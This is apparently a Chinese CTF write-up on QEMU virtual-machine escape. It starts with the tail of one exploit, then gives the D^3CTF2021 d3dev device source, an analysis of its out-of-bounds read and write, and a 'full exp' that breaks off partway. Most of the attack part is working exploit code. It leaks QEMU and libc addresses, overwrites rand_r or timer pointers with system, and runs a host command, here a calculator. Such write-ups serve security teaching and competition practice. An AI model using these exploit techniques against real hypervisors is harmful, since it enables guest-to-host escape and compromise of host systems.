; if (sscanf(line, "%llx %llx %llx" , &s, &e, &f) != 3 ) { idx++; continue ; } if (bar_idx >= 0 ) { if (idx == bar_idx) { if (!(f & IORESOURCE_MEM) || e < s) { fclose(fp); errno = EINVAL; return -1 ; } sel = idx; if (start) *start = s; if (end) *end = e; if (flags) *flags = f; break ; } } else { if (idx <= 5 && (f & IORESOURCE_MEM)) { if (e < s) { fclose(fp); errno = ERANGE; return -1 ; } sel = idx; if (start) *start = s; if (end) *end = e; if (flags) *flags = f; break ; } } idx++; } fclose(fp); if (sel < 0 ) { errno = ENOENT; return -1 ; } if (picked_idx) *picked_idx = sel; return 0 ; } /* --- 对外:初始化 / 映射 --- */ int mmio_init(const char* bdf_or_path, int bar_idx){ if (g_mmio.inited) { errno = EALREADY; return -1 ; } char resource_txt[PATH_MAX]; char dev_dir[PATH_MAX]; if (build_paths(bdf_or_path, resource_txt, sizeof(resource_txt), dev_dir, sizeof(dev_dir)) != 0 ) return -1 ; unsigned long long start = 0 , end = 0 , flags = 0 ; int res_idx = -1 ; if (parse_mem_bar(resource_txt, bar_idx, &start, &end, &flags, &res_idx) != 0 ) return -1 ; size_t size = (size_t)((end - start) + 1ULL); size_t pg = (size_t)sysconf(_SC_PAGESIZE); size_t map_len = (size + pg - 1 ) & ~(pg - 1 ); char res_path[PATH_MAX]; snprintf(res_path, sizeof(res_path), "%s/resource%d" , dev_dir, res_idx); int fd = open (res_path, O_RDWR | O_SYNC); if (fd < 0 ) return -1 ; // 对 MMIO,MAP_SHARED 必须;是否加 MAP_POPULATE 对 MMIO 不关键 void* map = mmap(NULL, map_len, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0 ); if (map == MAP_FAILED) { int sv = errno; close(fd); errno = sv; return -1 ; } g_mmio.bar = (volatile uint8_t*)map ; g_mmio.size = size; g_mmio.map_len = map_len; g_mmio.fd = fd; g_mmio.res_idx = res_idx; g_mmio.phys_start = (uint64_t)start; g_mmio.phys_end = (uint64_t)end; g_mmio.res_flags = flags; g_mmio.inited = true; return 0 ; } void mmio_fini(void) { if (!g_mmio.inited) return ; if (g_mmio.bar) munmap((void*)g_mmio.bar, g_mmio.map_len); if (g_mmio.fd >= 0 ) close(g_mmio.fd); memset(&g_mmio, 0 , sizeof(g_mmio)); } /* --- 查询(虚拟信息) --- */ volatile void* mmio_base(void) { return g_mmio.bar; } size_t mmio_size(void) { return g_mmio.size; } int mmio_bar_index(void) { return g_mmio.res_idx; }/* --- 查询(物理信息) --- */ uint64_t mmio_phys_base(void) { return g_mmio.phys_start; } uint64_t mmio_phys_limit(void) { return g_mmio.phys_end; } // inclusive /* off -> 设备物理地址(范围检查) */ uint64_t mmio_offset_to_phys(size_t off) { if (!g_mmio.inited) { errno = EPERM; return 0 ; } if (off >= g_mmio.size) { errno = ERANGE; return 0 ; } return g_mmio.phys_start + (uint64_t)off; } /* VA(映射内某指针) -> 设备物理地址(范围检查) */ uint64_t mmio_virt_to_phys(const void* p) { if (!g_mmio.inited || !p) { errno = EPERM; return 0 ; } uintptr_t base = (uintptr_t)g_mmio.bar; uintptr_t addr = (uintptr_t)p; if (addr < base || addr >= base + g_mmio.size) { errno = EINVAL; return 0 ; } size_t off = (size_t)(addr - base); return g_mmio.phys_start + (uint64_t)off; } /* --- 内部:范围检查 --- */ static inline int chk(size_t off, size_t width) { if (!g_mmio.inited) { errno = EPERM; return -1 ; } if (off + width > g_mmio.size) { errno = ERANGE; return -1 ; } return 0 ; } /* --- 读写 API(按天然宽度访问;PCI 寄存器通常小端) --- */ uint8_t mmio_read8(size_t off) { if (chk(off, 1 )) return 0 ; return *(volatile uint8_t*)(g_mmio.bar + off); } uint16_t mmio_read16(size_t off) { if (chk(off, 2 )) return 0 ; return *(volatile uint16_t*)(g_mmio.bar + off); } uint32_t mmio_read32(size_t off) { if (chk(off, 4 )) return 0 ; return *(volatile uint32_t*)(g_mmio.bar + off); } uint64_t mmio_read64(size_t off) { if (chk(off, 8 )) return 0 ; return *(volatile uint64_t*)(g_mmio.bar + off); } void mmio_write8(size_t off, uint8_t v) { if (chk(off, 1 )) return ; *(volatile uint8_t*)(g_mmio.bar + off) = v; } void mmio_write16(size_t off, uint16_t v) { if (chk(off, 2 )) return ; *(volatile uint16_t*)(g_mmio.bar + off) = v; } void mmio_write32(size_t off, uint32_t v) { if (chk(off, 4 )) return ; *(volatile uint32_t*)(g_mmio.bar + off) = v; } void mmio_write64(size_t off, uint64_t v) { if (chk(off, 8 )) return ; *(volatile uint64_t*)(g_mmio.bar + off) = v; } /* 返回映射内某 offset 的可直接访问指针 */ volatile void* mmio_ptr(size_t off) { if (chk(off, 1 )) return NULL; return (volatile void*)(g_mmio.bar + off); } enum { SRC = 0x08 , CNT = 0x10 , CMD = 0x18 }; typedef struct { size_t CP_src; size_t CP_cnt; size_t CP_dst; } CP_info; int main(){ mmio_init("0000:00:04.0" , 0 ); adjacent_pages_buf read_buf; get_adjacent_pages(&read_buf); printf("[+] read_buf vaddr[0]: %p\n" , read_buf.vaddr[0 ]); printf("[+] read_buf vaddr[1]: %p\n" , read_buf.vaddr[1 ]); printf("[+] read_buf paddr: %p\n" , read_buf.paddr); adjacent_pages_buf write_buf; get_adjacent_pages(&write_buf); printf("[+] write_buf vaddr[0]: %p\n" , write_buf.vaddr[0 ]); printf("[+] write_buf vaddr[1]: %p\n" , write_buf.vaddr[1 ]); printf("[+] write_buf paddr: %p\n" , write_buf.paddr); (*(CP_info*)write_buf.vaddr[0 ]).CP_dst = read_buf.paddr; (*(CP_info*)write_buf.vaddr[0 ]).CP_cnt = 0x1040 ; mmio_write64(SRC, write_buf.paddr); mmio_write64(CNT, 1 ); mmio_write64(CMD, 0x4 ); sleep(1 ); qword_dump(NULL, read_buf.vaddr[1 ], 0x40 ); size_t timer_list_addr = *(size_t*)(read_buf.vaddr[1 ] + 0x08 ); size_t qemu_base = *(size_t*)(read_buf.vaddr[1 ] + 0x10 ) - 0x4dce80 ; printf("[+] elf base: %p\n" , qemu_base); size_t system_plt = qemu_base + 0x2c2180 ; printf("[*] system@plt: %p\n" , system_plt); size_t opaque_addr = *(size_t*)(read_buf.vaddr[1 ] + 0x18 ); printf("[+] opaque addr: %p\n" , opaque_addr); for (int i = 0 ; i < 0x11 ; i++) { ((CP_info*)write_buf.vaddr[0 ])[i].CP_src = write_buf.paddr; ((CP_info*)write_buf.vaddr[0 ])[i].CP_dst = read_buf.paddr; ((CP_info*)write_buf.vaddr[0 ])[i].CP_cnt = 0x1020 ; } *(size_t*)(write_buf.vaddr[1 ] + 0x8 ) = timer_list_addr; *(size_t*)(write_buf.vaddr[1 ] + 0x10 ) = system_plt; *(size_t*)(write_buf.vaddr[1 ] + 0x18 ) = opaque_addr + 0xa00 + 0x500 ; char cmd[] = "/usr/bin/gnome-calculator" ; memcpy(write_buf.vaddr[0 ] + 0x500 , cmd, sizeof(cmd)); mmio_write64(SRC, write_buf.paddr); mmio_write64(CNT, 0x11 ); mmio_write64(CMD, 0x1 ); sleep(1 ); mmio_write64(CMD, 0x114514 ); return 0 ; }
D^3CTF2021 d3dev 漏洞分析 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 #include "qemu/osdep.h" #include "qemu/module.h" #include "qapi/error.h" #include "qom/object.h" #include "exec/memory.h" #include "hw/pci/pci.h" #include <time.h> #include <stdlib.h> #include <stdint.h> #define TYPE_D3DEV "d3dev" OBJECT_DECLARE_SIMPLE_TYPE(struct d3devState, D3DEV) struct d3devState { PCIDevice pdev; MemoryRegion mmio; MemoryRegion pmio; uint32_t memory_mode; uint32_t seek; uint32_t init_flag; uint32_t mmio_read_part; uint32_t mmio_write_part; uint32_t r_seed; uint64_t blocks[0x101 ]; uint32_t key[4 ]; int ( *rand_r)(uint32_t *); }; static inline void tea_encrypt_64 (uint32_t *lw, uint32_t *hi, const uint32_t k[4 ]) { uint32_t sum = 0 ; do { sum -= 0x61C88647 U; *lw += (sum + *hi) ^ (k[1 ] + (*hi >> 5 )) ^ (k[0 ] + (*hi << 4 )); *hi += (sum + *lw) ^ (k[3 ] + (*lw >> 5 )) ^ (k[2 ] + (*lw << 4 )); } while (sum != 0xC6EF3720 U); } static inline void tea_decrypt_64 (uint32_t *lw, uint32_t *hi, const uint32_t k[4 ]) { uint32_t sum = 0xC6EF3720 U; do { *hi -= (sum + *lw) ^ (k[3 ] + (*lw >> 5 )) ^ (k[2 ] + (*lw << 4 )); *lw -= (sum + *hi) ^ (k[1 ] + (*hi >> 5 )) ^ (k[0 ] + (*hi << 4 )); sum += 0x61C88647 U; } while (sum != 0 ); } static uint64_t d3dev_mmio_read (void *opaque, hwaddr addr, unsigned int size) { struct d3devState *s = (struct d3devState *)opaque; uint64_t blk = s->blocks[s->seek + ((unsigned int )(addr) >> 3 )]; uint32_t lw = (uint32_t )blk; uint32_t hi = (uint32_t )(blk >> 32 ); tea_decrypt_64(&lw, &hi, s->key); if (s->mmio_read_part) { s->mmio_read_part = 0 ; return (uint64_t )hi; } else { s->mmio_read_part = 1 ; return (uint64_t )lw; } } static void d3dev_mmio_write (void *opaque, hwaddr addr, uint64_t val, unsigned int size) { struct d3devState *s = (struct d3devState *)opaque; if (size != 4 ) { return ; } size_t idx = s->seek + ((unsigned int )(addr) >> 3 ); if (s->mmio_write_part) { uint32_t lw = (uint32_t )s->blocks[idx]; uint32_t hi = (uint32_t )((s->blocks[idx] >> 32 ) + val); tea_encrypt_64(&lw, &hi, s->key); s->blocks[idx] = ((uint64_t )hi << 32 ) | lw; s->mmio_write_part = 0 ; } else { s->blocks[idx] = (uint32_t )val; s->mmio_write_part = 1 ; } } static uint64_t d3dev_pmio_read (void *opaque, hwaddr addr, unsigned int size) { struct d3devState *s = (struct d3devState *)opaque; switch (addr) { case 0x00 : return s->memory_mode; case 0x08 : return s->seek; case 0x0C : return s->key[0 ]; case 0x10 : return s->key[1 ]; case 0x14 : return s->key[2 ]; case 0x18 : return s->key[3 ]; default : return (uint64_t )-1 ; } } static void d3dev_pmio_write (void *opaque, hwaddr addr, uint64_t val, unsigned int size) { struct d3devState *s = (struct d3devState *)opaque; switch (addr) { case 0x00 : s->memory_mode = (uint32_t )val; break ; case 0x04 : memset (s->key, 0 , sizeof (s->key)); break ; case 0x08 : if (val <= 0x100 ) { s->seek = (uint32_t )val; } break ; case 0x1C : s->r_seed = (uint32_t )val; { uint32_t *p = s->key; do { *p++ = (uint32_t )s->rand_r(&s->r_seed); } while (p != (uint32_t *)&s->rand_r); } break ; default : break ; } } static const MemoryRegionOps d3dev_mmio_ops = { .read = d3dev_mmio_read, .write = d3dev_mmio_write, .endianness = DEVICE_NATIVE_ENDIAN, }; static const MemoryRegionOps d3dev_pmio_ops = { .read = d3dev_pmio_read, .write = d3dev_pmio_write, .endianness = DEVICE_LITTLE_ENDIAN, }; static void pci_d3dev_realize (PCIDevice *pdev, Error **errp) { struct d3devState *s = D3DEV(pdev); memory_region_init_io(&s->mmio, OBJECT(pdev), &d3dev_mmio_ops, s, "d3dev-mmio" , 0x800 ); pci_register_bar(pdev, 0 , PCI_BASE_ADDRESS_SPACE_MEMORY, &s->mmio); memory_region_init_io(&s->pmio, OBJECT(pdev), &d3dev_pmio_ops, s, "d3dev-pmio" , 0x20 ); pci_register_bar(pdev, 1 , PCI_BASE_ADDRESS_SPACE_IO, &s->pmio); } static void d3dev_instance_init (Object *obj) { struct d3devState *s = D3DEV(obj); s->rand_r = rand_r; if (!s->init_flag) { unsigned i; srand((unsigned )time(NULL )); for (i = 0 ; i < 4 ; ++i) { s->key[i] = (uint32_t )rand(); } s->init_flag = 1 ; } } static void d3dev_class_init (ObjectClass *oc, void *data) { PCIDeviceClass *k = PCI_DEVICE_CLASS(oc); k->realize = pci_d3dev_realize; k->exit = NULL ; k->vendor_id = 0x2333 ; k->device_id = 0x11E8 ; k->revision = 0x10 ; k->class_id = PCI_CLASS_OTHERS; } static const TypeInfo d3dev_info = { .name = TYPE_D3DEV, .parent = TYPE_PCI_DEVICE, .instance_size = sizeof (struct d3devState), .instance_init = d3dev_instance_init, .class_init = d3dev_class_init, }; static void pci_d3dev_register_types (void ) { type_register_static(&d3dev_info); } type_init(pci_d3dev_register_types);
由于设备是通过 seek + addr / 8 来索引 uint64_t 类型的 blocks 数组, blocks 数组长度为 0x101 。
由于 MMIO 注册内存大小为 0x800,因此 addr 需要小于 0x800,也就是说 addr / 8 < 0x100。
seek 在设置的时候有判断要求小于等于 0x100。
因此我们可以通过修改 seek 为 0x100 来实现越界读写。
根据 mmio_write_part 的函数的实现逻辑如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 static void d3dev_mmio_write (void *opaque, hwaddr addr, uint64_t val, unsigned int size) { struct d3devState *s = (struct d3devState *)opaque; if (size != 4 ) { return ; } size_t idx = s->seek + ((unsigned int )(addr) >> 3 ); if (s->mmio_write_part) { uint32_t lw = (uint32_t )s->blocks[idx]; uint32_t hi = (uint32_t )((s->blocks[idx] >> 32 ) + val); tea_encrypt_64(&lw, &hi, s->key); s->blocks[idx] = ((uint64_t )hi << 32 ) | lw; s->mmio_write_part = 0 ; } else { s->blocks[idx] = (uint32_t )val; s->mmio_write_part = 1 ; } }
当 mmio_write_part == 0 时,会将 val 的低 32 比特高位补 0 成 64 比特写入 blocks[seek + addr / 8] 。
当 mmio_write_part == 1 时,会将 (blocks[seek + addr / 8] & 0xFFFFFFFF) | ((blocks[seek + addr / 8] & 0xFFFFFFFF00000000) + (val << 32)) 按如下方式进行加密,然后写入 blocks[seek + addr / 8] 。
1 2 3 4 5 6 7 8 9 static inline void tea_encrypt_64 (uint32_t *lw, uint32_t *hi, const uint32_t k[4 ]) { uint32_t sum = 0 ; do { sum -= 0x61C88647 U; *lw += (sum + *hi) ^ (k[1 ] + (*hi >> 5 )) ^ (k[0 ] + (*hi << 4 )); *hi += (sum + *lw) ^ (k[3 ] + (*lw >> 5 )) ^ (k[2 ] + (*lw << 4 )); } while (sum != 0xC6EF3720 U); }
因此我们有了越界写的方法:
首先我们将要写入的值 val 进行解密运算后得到 val' ;
然后我们首先在 mmio_write_part == 0 的情况下写 val' 的低 32 比特,此时高 32 位会被置 0,方便高 32 位数据写入 。
之后在 mmio_write_part == 1 的情况下写 val' 的高 32 比特,并且此时不会影响到上一步写入的低 32 位的数据 。
上述过程经过 mmio_write_part 函数的相关操作后等价为越界写了一个值 val。
d3dev_mmio_read 函数内容如下,与 d3dev_mmio_write 一样,这个函数同样存在越界操作。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 static uint64_t d3dev_mmio_read (void *opaque, hwaddr addr, unsigned int size) { struct d3devState *s = (struct d3devState *)opaque; uint64_t blk = s->blocks[s->seek + ((unsigned int )(addr) >> 3 )]; uint32_t lw = (uint32_t )blk; uint32_t hi = (uint32_t )(blk >> 32 ); tea_decrypt_64(&lw, &hi, s->key); if (s->mmio_read_part) { s->mmio_read_part = 0 ; return (uint64_t )hi; } else { s->mmio_read_part = 1 ; return (uint64_t )lw; } }
d3dev_mmio_write 会按照下面的方法解密 blocks[seek + addr / 8] 位置的 8 字节数据,并根据 mmio_read_part 的值是否为 1 决定返回解密结果的高 32 比特或低 32 比特。
1 2 3 4 5 6 7 8 9 static inline void tea_decrypt_64 (uint32_t *lw, uint32_t *hi, const uint32_t k[4 ]) { uint32_t sum = 0xC6EF3720 U; do { *hi -= (sum + *lw) ^ (k[3 ] + (*lw >> 5 )) ^ (k[2 ] + (*lw << 4 )); *lw -= (sum + *hi) ^ (k[1 ] + (*hi >> 5 )) ^ (k[0 ] + (*hi << 4 )); sum += 0x61C88647 U; } while (sum != 0 ); }
然而泄露的数据是被加密的,而我们没有秘钥无法解密。
但是当 mmio_write_part == 1 时,会将 (blocks[seek + addr / 8] & 0xFFFFFFFF) | ((blocks[seek + addr / 8] & 0xFFFFFFFF00000000) + (val << 32)) 加密然后写入 blocks[seek + addr / 8]。我们设置 val = 0,则效果相当于越界加密了一个 64 位的数据。
之后我们再利用越界读将加密的数据解密读出来就可以泄露对应位置原本的数据了。
漏洞利用 blocks 可以越界读泄露 rand_r 存储的 rand_r 函数地址,进而泄露 libc 基址。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 struct d3devState { PCIDevice pdev; MemoryRegion mmio; MemoryRegion pmio; uint32_t memory_mode; uint32_t seek; uint32_t init_flag; uint32_t mmio_read_part; uint32_t mmio_write_part; uint32_t r_seed; uint64_t blocks[0x101 ]; uint32_t key[4 ]; int ( *rand_r)(uint32_t *); };
由于 d3dev_pmio_write 的 0x04 分支可以清空 key 字段,因此 key 已知。
1 2 3 case 0x04 : memset (s->key, 0 , sizeof (s->key)); break ;
d3dev_pmio_write 的 0x1C 功能可以回调 rand_r 函数指针,参数为 r_seed 的地址。并且在调用回调函数前可以设置 r_seed 的值。
1 2 3 4 5 6 7 8 9 case 0x1C : s->r_seed = (uint32_t )val; { uint32_t *p = s->key; do { *p++ = (uint32_t )s->rand_r(&s->r_seed); } while (p != (uint32_t *)&s->rand_r); } break ;
因此可以越界写修改 rand_r 为 system 函数地址,并且在 r_seed 中写入要传入的命令。
不过这里 r_seed 只能写入 4 字节,命令 4 字节之后的内容需要写到 block 中。
完整 Exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599 600 601 602 603 604 605 606 607 608 609 610 611 612 613 614 615 616 617 618 619 620 621 622 623 624 625 626 627 628 629 630 631 #include <fcntl.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <sys/mman.h> #include <sys/io.h> #define _GNU_SOURCE #include <errno.h> #include <fcntl.h> #include <inttypes.h> #include <stdbool.h> #include <stddef.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <limits.h> #include <string.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/types.h> #include <unistd.h> #define IORESOURCE_MEM 0x00000200ULL typedef struct { volatile uint8_t * bar; size_t size; size_t map_len; int fd; int res_idx; uint64_t phys_start; uint64_t phys_end; unsigned long long res_flags; bool inited; } mmio_ctx_t ; static mmio_ctx_t g_mmio = {0 };static int build_paths (const char * bdf_or_path, char * resource_txt, size_t txt_sz, char * dev_dir, size_t dir_sz) { if (!bdf_or_path || !*bdf_or_path) { errno = EINVAL; return -1 ; } if (strchr (bdf_or_path, '/' )) { snprintf (resource_txt, txt_sz, "%s" , bdf_or_path); snprintf (dev_dir, dir_sz, "%s" , bdf_or_path); char * slash = strrchr (dev_dir, '/' ); if (!slash) { errno = EINVAL; return -1 ; } *slash = '\0' ; if (strstr (resource_txt, "/resource" ) && resource_txt[strlen (resource_txt) - 1 ] >= '0' && resource_txt[strlen (resource_txt) - 1 ] <= '9' ) { snprintf (resource_txt, txt_sz, "%s/resource" , dev_dir); } } else { snprintf (resource_txt, txt_sz, "/sys/bus/pci/devices/%s/resource" , bdf_or_path); snprintf (dev_dir, dir_sz, "/sys/bus/pci/devices/%s" , bdf_or_path); } return 0 ; } static int parse_mem_bar (const char * resource_txt, int bar_idx, unsigned long long * start, unsigned long long * end, unsigned long long * flags, int * picked_idx) { FILE* fp = fopen(resource_txt, "r" ); if (!fp) return -1 ; int idx = 0 , sel = -1 ; char line[256 ]; while (fgets(line, sizeof (line), fp)) { unsigned long long s = 0 , e = 0 , f = 0 ; if (sscanf (line, "%llx %llx %llx" , &s, &e, &f) != 3 ) { idx++; continue ; } if (bar_idx >= 0 ) { if (idx == bar_idx) { if (!(f & IORESOURCE_MEM) || e < s) { fclose(fp); errno = EINVAL; return -1 ; } sel = idx; if (start) *start = s; if (end) *end = e; if (flags) *flags = f; break ; } } else { if (idx <= 5 && (f & IORESOURCE_MEM)) { if (e < s) { fclose(fp); errno = ERANGE; return -1 ; } sel = idx; if (start) *start = s; if (end) *end = e; if (flags) *flags = f; break ; } } idx++; } fclose(fp); if (sel < 0 ) { errno = ENOENT; return -1 ; } if (picked_idx) *picked_idx = sel; return 0 ; } int mmio_init (const char * bdf_or_path, int bar_idx) { if (g_mmio.inited) { errno = EALREADY; return -1 ; } char resource_txt[PATH_MAX]; char dev_dir[PATH_MAX]; if (build_paths(bdf_or_path, resource_txt, sizeof (resource_txt), dev_dir, sizeof (dev_dir)) != 0 ) return -1 ; unsigned long long start = 0 , end = 0 , flags = 0 ; int res_idx = -1 ; if (parse_mem_bar(resource_txt, bar_idx, &start, &end, &flags, &res_idx) != 0 ) return -1 ; size_t size = (size_t )((end - start) + 1ULL ); size_t pg = (size_t )sysconf(_SC_PAGESIZE); size_t map_len = (size + pg - 1 ) & ~(pg - 1 ); char res_path[PATH_MAX]; snprintf (res_path, sizeof (res_path), "%s/resource%d" , dev_dir, res_idx); int fd = open(res_path, O_RDWR | O_SYNC); if (fd < 0 ) return -1 ; void * map = mmap(NULL , map_len, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0 ); if (map == MAP_FAILED) { int sv = errno; close(fd); errno = sv; return -1 ; } g_mmio.bar = (volatile uint8_t *)map ; g_mmio.size = size; g_mmio.map_len = map_len; g_mmio.fd = fd; g_mmio.res_idx = res_idx; g_mmio.phys_start = (uint64_t )start; g_mmio.phys_end = (uint64_t )end; g_mmio.res_flags = flags; g_mmio.inited = true ; return 0 ; } void mmio_fini (void ) { if (!g_mmio.inited) return ; if (g_mmio.bar) munmap((void *)g_mmio.bar, g_mmio.map_len); if (g_mmio.fd >= 0 ) close(g_mmio.fd); memset (&g_mmio, 0 , sizeof (g_mmio)); } volatile void * mmio_base (void ) { return g_mmio.bar; }size_t mmio_size (void ) { return g_mmio.size; }int mmio_bar_index (void ) { return g_mmio.res_idx; }uint64_t mmio_phys_base (void ) { return g_mmio.phys_start; }uint64_t mmio_phys_limit (void ) { return g_mmio.phys_end; } uint64_t mmio_offset_to_phys (size_t off) { if (!g_mmio.inited) { errno = EPERM; return 0 ; } if (off >= g_mmio.size) { errno = ERANGE; return 0 ; } return g_mmio.phys_start + (uint64_t )off; } uint64_t mmio_virt_to_phys (const void * p) { if (!g_mmio.inited || !p) { errno = EPERM; return 0 ; } uintptr_t base = (uintptr_t )g_mmio.bar; uintptr_t addr = (uintptr_t )p; if (addr < base || addr >= base + g_mmio.size) { errno = EINVAL; return 0 ; } size_t off = (size_t )(addr - base); return g_mmio.phys_start + (uint64_t )off; } static inline int chk (size_t off, size_t width) { if (!g_mmio.inited) { errno = EPERM; return -1 ; } if (off + width > g_mmio.size) { errno = ERANGE; return -1 ; } return 0 ; } uint8_t mmio_read8 (size_t off) { if (chk(off, 1 )) return 0 ; return *(volatile uint8_t *)(g_mmio.bar + off); } uint16_t mmio_read16 (size_t off) { if (chk(off, 2 )) return 0 ; return *(volatile uint16_t *)(g_mmio.bar + off); } uint32_t mmio_read32 (size_t off) { if (chk(off, 4 )) return 0 ; return *(volatile uint32_t *)(g_mmio.bar + off); } uint64_t mmio_read64 (size_t off) { if (chk(off, 8 )) return 0 ; return *(volatile uint64_t *)(g_mmio.bar + off); } void mmio_write8 (size_t off, uint8_t v) { if (chk(off, 1 )) return ; *(volatile uint8_t *)(g_mmio.bar + off) = v; } void mmio_write16 (size_t off, uint16_t v) { if (chk(off, 2 )) return ; *(volatile uint16_t *)(g_mmio.bar + off) = v; } void mmio_write32 (size_t off, uint32_t v) { if (chk(off, 4 )) return ; *(volatile uint32_t *)(g_mmio.bar + off) = v; } void mmio_write64 (size_t off, uint64_t v) { if (chk(off, 8 )) return ; *(volatile uint64_t *)(g_mmio.bar + off) = v; } volatile void * mmio_ptr (size_t off) { if (chk(off, 1 )) return NULL ; return (volatile void *)(g_mmio.bar + off); } #define _GNU_SOURCE #include <errno.h> #include <inttypes.h> #include <stdbool.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/io.h> #include <unistd.h> #define IORESOURCE_IO 0x00000100ULL typedef struct { uint16_t base; uint32_t size; uint16_t grant_base; uint32_t grant_len; bool have_ioperm; bool have_iopl; bool inited; } pio_ctx_t ; static pio_ctx_t g_pio = {0 };static int parse_io_bar (const char * bdf_or_path, int bar_idx, uint16_t * out_base, uint32_t * out_size) { char path[256 ]; if (strchr (bdf_or_path, '/' )) { snprintf (path, sizeof (path), "%s" , bdf_or_path); } else { snprintf (path, sizeof (path), "/sys/bus/pci/devices/%s/resource" , bdf_or_path); } FILE* fp = fopen(path, "r" ); if (!fp) return -1 ; int idx = 0 , chosen = -1 ; char line[256 ]; while (fgets(line, sizeof (line), fp)) { unsigned long long start = 0 , end = 0 , flags = 0 ; if (sscanf (line, "%llx %llx %llx" , &start, &end, &flags) != 3 ) { idx++; continue ; } if (bar_idx >= 0 ) { if (idx == bar_idx) { if (!(flags & IORESOURCE_IO)) { fclose(fp); errno = EINVAL; return -1 ; } if (end < start || start > 0xFFFF ULL) { fclose(fp); errno = ERANGE; return -1 ; } *out_base = (uint16_t )start; *out_size = (uint32_t )(end - start + 1 ); chosen = idx; break ; } } else { if (idx <= 5 && (flags & IORESOURCE_IO)) { if (end < start || start > 0xFFFF ULL) { fclose(fp); errno = ERANGE; return -1 ; } *out_base = (uint16_t )start; *out_size = (uint32_t )(end - start + 1 ); chosen = idx; break ; } } idx++; } fclose(fp); if (chosen < 0 ) { errno = ENOENT; return -1 ; } return 0 ; } static int acquire_io_priv (uint16_t base, uint32_t size, uint16_t * grant_base, uint32_t * grant_len, bool * have_ioperm, bool * have_iopl) { uint32_t len = size; if ((unsigned )base + len > 0x10000 u) len = 0x10000 u - base; if (len == 0 ) len = 1 ; if (ioperm(base, len, 1 ) == 0 ) { *grant_base = base; *grant_len = len; *have_ioperm = true ; *have_iopl = false ; return 0 ; } if (iopl(3 ) == 0 ) { *grant_base = 0 ; *grant_len = 0 ; *have_ioperm = false ; *have_iopl = true ; return 0 ; } return -1 ; } int pio_init (const char * bdf_or_path, int bar_idx) { if (g_pio.inited) { errno = EALREADY; return -1 ; } uint16_t base = 0 ; uint32_t size = 0 ; if (parse_io_bar(bdf_or_path, bar_idx, &base, &size) != 0 ) return -1 ; uint16_t gbase = 0 ; uint32_t glen = 0 ; bool have_perm = false , have_iopl = false ; if (acquire_io_priv(base, size, &gbase, &glen, &have_perm, &have_iopl) != 0 ) return -1 ; g_pio.base = base; g_pio.size = size; g_pio.grant_base = gbase; g_pio.grant_len = glen; g_pio.have_ioperm = have_perm; g_pio.have_iopl = have_iopl; g_pio.inited = true ; return 0 ; } void pio_fini (void ) { if (!g_pio.inited) return ; if (g_pio.have_ioperm) (void )ioperm(g_pio.grant_base, g_pio.grant_len, 0 ); if (g_pio.have_iopl) (void )iopl(0 ); memset (&g_pio, 0 , sizeof (g_pio)); } 